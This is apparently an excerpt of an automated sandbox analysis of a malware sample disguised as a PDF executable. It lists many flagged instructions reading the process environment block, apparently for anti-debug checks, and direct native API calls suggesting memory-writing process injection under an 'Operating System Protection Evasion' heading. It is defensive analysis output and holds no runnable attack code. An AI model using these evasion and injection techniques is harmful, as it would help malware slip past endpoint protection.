        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AED454 mov eax, dword ptr fs:[00000030h]2_2_36AED454
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B87591 mov edi, dword ptr fs:[00000030h]2_2_36B87591
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B19580 mov eax, dword ptr fs:[00000030h]2_2_36B19580
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B19580 mov eax, dword ptr fs:[00000030h]2_2_36B19580
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B58B mov eax, dword ptr fs:[00000030h]2_2_36B8B58B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F582 mov eax, dword ptr fs:[00000030h]2_2_36B9F582
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB5E0 mov eax, dword ptr fs:[00000030h]2_2_36AEB5E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B655E0 mov eax, dword ptr fs:[00000030h]2_2_36B655E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B115EF mov eax, dword ptr fs:[00000030h]2_2_36B115EF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6B5D3 mov eax, dword ptr fs:[00000030h]2_2_36B6B5D3
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADF5C7 mov eax, dword ptr fs:[00000030h]2_2_36ADF5C7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h]2_2_36BB753C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB753C mov ecx, dword ptr fs:[00000030h]2_2_36BB753C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB753C mov eax, dword ptr fs:[00000030h]2_2_36BB753C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1F523 mov eax, dword ptr fs:[00000030h]2_2_36B1F523
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h]2_2_36AD753F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h]2_2_36AD753F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD753F mov eax, dword ptr fs:[00000030h]2_2_36AD753F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B11527 mov eax, dword ptr fs:[00000030h]2_2_36B11527
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h]2_2_36AE3536
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE3536 mov eax, dword ptr fs:[00000030h]2_2_36AE3536
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov ecx, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F51B mov eax, dword ptr fs:[00000030h]2_2_36B8F51B
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B01514 mov eax, dword ptr fs:[00000030h]2_2_36B01514
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB502 mov eax, dword ptr fs:[00000030h]2_2_36ADB502
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h]2_2_36B9550D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h]2_2_36B9550D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9550D mov eax, dword ptr fs:[00000030h]2_2_36B9550D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B69567 mov eax, dword ptr fs:[00000030h]2_2_36B69567
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h]2_2_36B9B56E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B56E mov ecx, dword ptr fs:[00000030h]2_2_36B9B56E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B56E mov eax, dword ptr fs:[00000030h]2_2_36B9B56E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h]2_2_36BBB55F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB55F mov eax, dword ptr fs:[00000030h]2_2_36BBB55F
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD92AF mov eax, dword ptr fs:[00000030h]2_2_36AD92AF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BBB2BC mov eax, dword ptr fs:[00000030h]2_2_36BBB2BC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA92AB mov eax, dword ptr fs:[00000030h]2_2_36BA92AB
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F2AE mov eax, dword ptr fs:[00000030h]2_2_36B9F2AE
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h]2_2_36AE7290
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h]2_2_36AE7290
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE7290 mov eax, dword ptr fs:[00000030h]2_2_36AE7290
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h]2_2_36ADD2EC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADD2EC mov eax, dword ptr fs:[00000030h]2_2_36ADD2EC
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD72E0 mov eax, dword ptr fs:[00000030h]2_2_36AD72E0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B832DF mov eax, dword ptr fs:[00000030h]2_2_36B832DF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h]2_2_36B132C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B132C0 mov eax, dword ptr fs:[00000030h]2_2_36B132C0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB32C9 mov eax, dword ptr fs:[00000030h]2_2_36BB32C9
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B032C5 mov eax, dword ptr fs:[00000030h]2_2_36B032C5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h]2_2_36B6B214
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6B214 mov eax, dword ptr fs:[00000030h]2_2_36B6B214
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D270 mov eax, dword ptr fs:[00000030h]2_2_36B9D270
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B7327E mov eax, dword ptr fs:[00000030h]2_2_36B7327E
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h]2_2_36ADB273
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h]2_2_36ADB273
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB273 mov eax, dword ptr fs:[00000030h]2_2_36ADB273
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5D250 mov eax, dword ptr fs:[00000030h]2_2_36B5D250
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B5D250 mov ecx, dword ptr fs:[00000030h]2_2_36B5D250
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BA124C mov eax, dword ptr fs:[00000030h]2_2_36BA124C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0F24A mov eax, dword ptr fs:[00000030h]2_2_36B0F24A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F247 mov eax, dword ptr fs:[00000030h]2_2_36B9F247
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h]2_2_36AE93A6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE93A6 mov eax, dword ptr fs:[00000030h]2_2_36AE93A6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h]2_2_36B81390
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B81390 mov eax, dword ptr fs:[00000030h]2_2_36B81390
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AE1380 mov eax, dword ptr fs:[00000030h]2_2_36AE1380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AFF380 mov eax, dword ptr fs:[00000030h]2_2_36AFF380
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F38A mov eax, dword ptr fs:[00000030h]2_2_36B9F38A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B133D0 mov eax, dword ptr fs:[00000030h]2_2_36B133D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h]2_2_36B9D330
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9D330 mov eax, dword ptr fs:[00000030h]2_2_36B9D330
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB3336 mov eax, dword ptr fs:[00000030h]2_2_36BB3336
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B0332D mov eax, dword ptr fs:[00000030h]2_2_36B0332D
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h]2_2_36AD9303
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD9303 mov eax, dword ptr fs:[00000030h]2_2_36AD9303
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9F30A mov eax, dword ptr fs:[00000030h]2_2_36B9F30A
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B6330C mov eax, dword ptr fs:[00000030h]2_2_36B6330C
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AEB360 mov eax, dword ptr fs:[00000030h]2_2_36AEB360
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36BB50B7 mov eax, dword ptr fs:[00000030h]2_2_36BB50B7
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B9B0AF mov eax, dword ptr fs:[00000030h]2_2_36B9B0AF
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8F0A5 mov eax, dword ptr fs:[00000030h]2_2_36B8F0A5
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B67090 mov eax, dword ptr fs:[00000030h]2_2_36B67090
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D0F0 mov eax, dword ptr fs:[00000030h]2_2_36B1D0F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B1D0F0 mov ecx, dword ptr fs:[00000030h]2_2_36B1D0F0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36AD90F8 mov eax, dword ptr fs:[00000030h]2_2_36AD90F8
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h]2_2_36B8B0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h]2_2_36B8B0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36B8B0D0 mov eax, dword ptr fs:[00000030h]2_2_36B8B0D0
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6
        Source: C:\Users\user\Desktop\BM-FM_NR.24040718PDF.exeCode function: 2_2_36ADB0D6 mov eax, dword ptr fs:[00000030h]2_2_36ADB0D6

        HIPS / PFW / Operating System Protection Evasion

        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtAllocateVirtualMemory: Direct from: 0x7756480C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtClose: Direct from: 0x77562A8C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtCreateKey: Direct from: 0x77562B8C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtSetInformationThread: Direct from: 0x77562A6C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtQueryAttributesFile: Direct from: 0x77562D8C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtOpenKeyEx: Direct from: 0x77562ABC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtQueryInformationProcess: Direct from: 0x77562B46
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtResumeThread: Direct from: 0x77562EDC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtCreateUserProcess: Direct from: 0x7756363C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtProtectVirtualMemory: Direct from: 0x77562EBC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtWriteVirtualMemory: Direct from: 0x7756482C
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtDelayExecution: Direct from: 0x77562CFC
        Source: C:\Program Files (x86)\UEoBkmdrdVTeIzMRbVVhquLLMYSPODYnRngAjVnDHe\asoFfnDVnWYESbbZcbazpTYkAQVO.exe | NtWriteVirtualMemory: Direct from: 0x77562D5C
